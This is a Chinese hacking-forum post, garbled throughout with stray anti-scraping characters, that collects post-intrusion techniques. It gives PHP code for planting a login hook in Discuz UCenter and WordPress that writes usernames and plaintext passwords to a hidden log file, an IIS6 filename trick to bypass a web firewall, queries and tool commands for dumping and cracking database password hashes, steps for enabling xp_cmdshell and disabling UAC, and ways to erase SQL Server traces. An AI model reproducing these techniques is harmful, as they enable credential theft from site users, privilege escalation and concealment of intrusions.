当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。
" A9 X( u+ f' B) H+ S# \就是搜索case ‘login’" A% k' X6 S% A/ s6 W& s
在它下面直接插入即可,记录的密码生成在pwd.txt中,6 r% m7 l- k5 d
其实修改wp-login.php不是个好办法。容易被发现,还有其他的方法的,做个记录4 k5 j+ }9 ^! m1 j
利用II6文件解析漏洞绕过安全狗代码:
, y' T7 x- N6 i# C( M5 c; O9 c;antian365.asp;antian365.jpg
6 I5 U( U% s8 j6 x6 q- O- o( h: d0 j0 z( `8 U: R0 \% ?
各种类型数据库抓HASH破解最高权限密码!8 |  G. X) n! }- {2 g9 f2 K
1.sql server20005 I# ]. x9 w1 q  P3 C, a9 q
SELECT password from master.dbo.sysxlogins where name='sa'
1 C0 f* q" M3 M( j, w* y! j0×010034767D5C0CFA5FDCA28C4A56085E65E882E71CB0ED250341( o1 U0 F" q6 S. Z, L3 \9 w
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A' V: L, Z+ t+ u! M

6 `* u7 c$ K* l% o4 V0×0100- constant header
. O; ]; M; d$ I8 J. o0 F" s34767D5C- salt+ v: e% _7 t" U
0CFA5FDCA28C4A56085E65E882E71CB0ED250341- case senstive hash8 C3 M! D& W+ J% t( Y
2FD54D6119FFF04129A1D72E7C3194F7284A7F3A- upper case hash
# W+ l0 ^( u* Fcrack the upper case hash in ‘cain and abel’ and then work the case sentive hash- q- }! ]% {% h- D; E
SQL server 2005:-
( _' H; s/ b; V' e! BSELECT password_hash FROM sys.sql_logins where name='sa'
6 g4 w9 t0 x( W( y* R0×0100993BF2315F36CC441485B35C4D84687DC02C78B0E680411F
) j2 i, p0 }; o; I% e: \! J0×0100- constant header
+ T; c6 a7 Y2 i* C$ g% g993BF231-salt3 P% T1 T4 k" Y) O0 e2 e
5F36CC441485B35C4D84687DC02C78B0E680411F- case sensitive hash
$ p3 T% [9 _$ w4 Zcrack case sensitive hash in cain, try brute force and dictionary based attacks.- ]2 i' r  m. L; z) W0 z

7 C7 q* q5 {. k8 R- y% ]! Oupdate:- following bernardo’s comments:-$ d7 M- ^5 T3 n; D4 ~
use function fn_varbintohexstr() to cast password in a hex string.' y" ]: p' @$ ^) f+ I) w! K  ]2 {
e.g. select name from sysxlogins union all select master.dbo.fn_varbintohexstr(password)from sysxlogins7 t. r# L" K9 [0 v

# k* E- ]6 |5 A3 W: XMYSQL:-( b  L6 @1 G7 K* J

* B1 j8 ]4 n) @$ j! iIn MySQL you can generate hashes internally using the password(), md5(), or sha1 functions. password() is the function used for MySQL’s own user authentication system. It returns a 16-byte string for MySQL versions prior to 4.1, and a 41-byte string (based on a double SHA-1 hash) for versions 4.1 and up. md5() is available from MySQL version 3.23.2 and sha1() was added later in 4.0.2.$ o  v" `6 |* m# b
$ K  v+ m$ W% f( E* }. s- q
*mysql  < 4.1
! [7 O, Q4 k) p" x* p1 Y$ e9 c
4 N+ n7 e! w; D+ B  imysql> SELECT PASSWORD(‘mypass’);# n" i2 F( A( a3 z3 c- ]( |
+——————–+
! D( }/ z% D5 X| PASSWORD(‘mypass’) |
6 X2 j- Z; j% f1 k$ C' h+——————–+$ f  [7 g0 i. f3 a: h) d6 \
| 6f8c114b58f2ce9e   |
+ G/ ]1 O0 ^7 Y. {9 x& T+ _+——————–+
; {: q1 e5 r8 h: ?5 x+ @5 g  r2 O+ K  }1 z9 W% }* Q
*mysql >=4.1
/ J- A' W% H2 V* d
3 ]  N/ M  T1 _4 r2 D7 Wmysql> SELECT PASSWORD(‘mypass’);2 S3 D% _: |& _* n
+——————————————-+* ?; b% R5 N9 f8 `3 k
| PASSWORD(‘mypass’)                        |" P$ ^/ Z( A+ m  t! r# X1 h
+——————————————-+
) ~. ~. \+ \7 w' X: y% V| *6C8989366EAF75BB670AD8EA7A7FC1176A95CEF4 |7 s# e: r/ f8 f! b- `0 s
+——————————————-+
3 N% [4 _( M9 O% b6 K
( R! U; G6 u, d9 ^' tSelect user, password from mysql.user% T7 A& B! e2 E1 }2 ^7 u! z
The hashes can be cracked in ‘cain and abel’
2 `3 r  D  l! X, S; u/ a) r" {9 s+ L5 f6 L5 m* ^
Postgres:-/ {8 S( o( Q) X3 M( Y* Y
Postgres keeps MD5-based password hashes for database-level users in the pg_shadow table.  You need to be the database superuser to read this table (usually called “postgres” or “pgsql”)7 V6 `9 n8 n. T$ ?! y* j3 M, Q9 S
select usename, passwd from pg_shadow;
. F- W; A$ v2 w; @. {8 yusename      |  passwd  _5 m' ^1 j0 _6 q
——————+————————————-
/ v  M& j+ E  P8 |testuser            | md5fabb6d7172aadfda4753bf0507ed43966 w: I2 a# U: K: p; W  y
use mdcrack to crack these hashes:-
; L+ b0 z+ ~  P" w" e: r- X6 Q$ wine MDCrack-sse.exe –algorithm=MD5 –append=testuser fabb6d7172aadfda4753bf0507ed4396& H5 C' C4 l1 p5 w& _5 H- M
- A0 r+ T! d6 D4 Q
Oracle:-2 f0 O( V! F9 t, ?0 x
select name, password, spare4 from sys.user$5 D  G: |7 Z& r+ H" `
hashes could be cracked using ‘cain and abel’ or thc-orakelcrackert11g
6 d0 L  ]1 X4 L7 V/ T- M8 |More on Oracle later, i am a bit bored….
* G# P6 I4 s# U% D6 w2 z  \
* L0 _! X. [" ]# O! g0 a7 D/ p8 D! Z) o! k
在sql server2005/2008中开启xp_cmdshell5 }! \& {9 v& M! k! B+ q: x3 i
-- To allow advanced options to be changed.
$ `% a% X" J8 X8 j" N9 W& XEXEC sp_configure 'show advanced options', 17 H6 _6 G/ |5 K0 f* z* t# W, G- e& D
GO
7 R: z7 O9 C& X+ Z3 b$ U1 [-- To update the currently configured value for advanced options.4 b* g: z4 y0 \. c
RECONFIGURE
4 ^; I& Z, `  i9 ~  Q/ vGO
) |  D- T5 X! ?-- To enable the feature.
2 }- r3 Z- i1 w5 VEXEC sp_configure 'xp_cmdshell', 17 Z7 ?: m+ B4 V- y* \
GO
( g$ N$ t) f: Q-- To update the currently configured value for this feature.
. P( N( E2 m& g1 r+ i( hRECONFIGURE
* M% _7 x; N  P0 o( R. h1 AGO
$ A! N! b: P- v( p$ \9 f, Q* ZSQL 2008 server日志清除,在清楚前一定要备份。' F& L( A4 H9 \% P" s3 ?
如果Windows Server 2008 标准版安装SQL Express 2008,则在这里删除:
% `$ C/ c- C9 }) H$ ]; dX:\Users[SomeUser]\AppData\Roaming\Microsoft\Microsoft SQL Server\100\Tools\Shell\SqlStudio.bin
& Z( x/ o6 r6 E( N1 n6 e* Y- G7 g5 V* x. L! ]& \% Q7 g
对于SQL Server 2008以前的版本:, n- Q2 a, W* u  s7 V
SQL Server 2005:1 z0 Z. ~4 W1 V8 x. w$ B
删除X:\Documents and Settings\XXX\Application Data\Microsoft\Microsoft SQL Server\90\Tools\Shell\mru.dat
: D" q: D7 |1 cSQL Server 2000:
- c" i/ l+ L0 S! Z& w# m7 w清除注册表HKEY_CURRENT_USER\Software\Microsoft\Microsoft  SQL  Server\80\Tools\Client\PrefServers\相应的内容即可。
7 y* W1 y2 J& [  o
6 s" S' E' |4 o7 W- s) I本帖最后由 simeon 于 2013-1-3 09:51 编辑
4 O$ e+ [+ w- z2 j# g" Z( m4 Y# C! a
& i1 ]4 T& S& e8 u3 i
windows 2008 文件权限修改5 |0 l0 M. a( R# d% C5 m+ t
1.http://technet.microsoft.com/zh- ... 4%28v=ws.10%29.aspx
3 I! U- x2 L8 a2 e. B7 ?2.http://hi.baidu.com/xiaobei713/item/b0cfae38f6bd278df5e4ad982 r" ?. x3 Z7 {! i
一、先在右键菜单里面看看有没有“管理员取得所有权”,没有“管理员取得所有权”,! P" Q% t7 a5 L
( I( l- U* I8 ]4 T8 D
Windows Registry Editor Version 5.00* Z. t; G& X/ \* h. }  o
[HKEY_CLASSES_ROOT\*\shell\runas]
& D; W% x( J9 ]5 l4 `3 x@="管理员取得所有权"- o" u: D0 j: Y5 m" K7 u
"NoWorkingDirectory"=""
* _8 X/ P7 V& G4 d" ^4 y, y8 u[HKEY_CLASSES_ROOT\*\shell\runas\command]* ^! s+ w' U3 a
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
8 N" U: D8 Q3 V"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"
0 A6 W8 u2 X1 N& h  ?7 l+ b[HKEY_CLASSES_ROOT\exefile\shell\runas2]
6 i  |- H  r5 N& O0 u@="管理员取得所有权"+ Z* w7 G7 f, r" V1 }9 I3 D2 y
"NoWorkingDirectory"=""( w& O) M! l4 ^  G' X
[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]- l. f  r5 b& S4 ]
@="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F"# [* z# c; |) A7 H
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" && icacls \"%1\" /grant administrators:F", n+ L* z' a1 n3 Q1 O  K: ~5 J# }4 f

  Q5 }' ^# e5 U7 K5 ?: Q[HKEY_CLASSES_ROOT\Directory\shell\runas]
! a# H0 `4 K! b7 Y@="管理员取得所有权"0 p5 z5 {, ^+ i# Q8 c# B+ x
"NoWorkingDirectory"=""
1 z! n* t/ B% a$ Y6 }& u( d3 B% ~[HKEY_CLASSES_ROOT\Directory\shell\runas\command]
: r* x, G/ _& I" _* `" d@="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t"/ E& x7 W; p- K  {
"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y && icacls \"%1\" /grant administrators:F /t". r7 @6 M7 ]& v  B% c& f
- V# v/ q0 {; W; W, S6 l
& Y* G, L) E8 N. J. T
win7右键“管理员取得所有权”.reg导入* W2 j" e# |2 N. G  i
二、在C:\Windows目录里下搜索“notepad.exe”文件,应该会搜索到四个“notepad.exe”和四个“notepad.exe.mui”,
0 ~$ {9 H% G2 V6 z3 I7 b1、C:\Windows这个路径的“notepad.exe”不需要替换
+ s4 s7 w3 R6 ^3 j. c& ^. s7 S  p+ R2、C:\Windows\System32这个路径的“notepad.exe”不需要替换" u! `0 t: W! o' [' T( J
3、四个“notepad.exe.mui”不要管
& y' G9 p/ v# g$ K4、主要替换C:\Windows\winsxs\x86_microsoft-windows-notepad_31bf3856ad364e35_6.1.7600.16385_none_6ef0e39ed15350e4和
3 q# u5 v) F3 @# {1 K7 ^C:\Windows\winsxs\x86_microsoft-windows-notepadwin_31bf3856ad364e35_6.1.7600.16385_none_42a023025c60a33a两个文件下的“notepad.exe”& u  D0 P2 h) F
替换方法先取得这两个文件夹的管理员权限,然后把“Notepad2.exe”重命名为“notepad.exe”替换到这两个文件夹下面,
& s& N" K* Y* q: [1 a) a. h替换完之后回到桌面,新建一个txt文档打开看看是不是变了。2 w: f3 w& D6 }1 B2 S
windows 2008中关闭安全策略: ( e) ^5 V5 ~  p8 B- _! p2 O# w
reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f( K$ J" j* C. ^6 A7 O
修改uc_client目录下的client.php 在
9 ~( H- p1 F0 E4 @0 v! _! Hfunction uc_user_login($username, $password, $isuid = 0, $checkques = 0, $questionid = '', $answer = '') {' t! Y* b2 t) w/ c
下加入如上代码,在网站./data/cache/目录下自动生成csslog.php) \* X9 J+ ^; j
你可以在ipdata目录下添加 view.php 可以用来查看记录的,密码为:falw6 c7 ^; D( `3 e) r! g9 Q
if(getenv('HTTP_CLIENT_IP')) {6 D3 |2 |' W7 K/ u) ]" _& T
$onlineip = getenv('HTTP_CLIENT_IP');  [* l6 g& O& D) ^! B
} elseif(getenv('HTTP_X_FORWARDED_FOR')) {. S; V0 f: n4 u' Q7 k7 y; M6 R
$onlineip = getenv('HTTP_X_FORWARDED_FOR');
1 T) |6 o3 M) C! y. }} elseif(getenv('REMOTE_ADDR')) {
* A/ q5 l7 v3 T# V* x$onlineip = getenv('REMOTE_ADDR');
3 X! Y% I! B. `. p8 C- j, G} else {! Z- B5 b/ c  @" J, K  v# m
$onlineip = $HTTP_SERVER_VARS['REMOTE_ADDR'];# }% M4 W' V5 h/ G! O
}
3 I" Q# y: V& J  J/ M2 ~  i: k0 F     $showtime=date("Y-m-d H:i:s");5 u# x- p2 w& C# V5 c
    $record="<?exit();?>用户:".$username." 密码:".$password." IP:".$onlineip." Time:".$showtime."\r\n";
, F4 _: Q8 r0 X3 x    $handle=fopen('./data/cache/csslog.php','a+');
" n, {1 m/ c0 E, [) D# }( F    $write=fwrite($handle,$record);
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表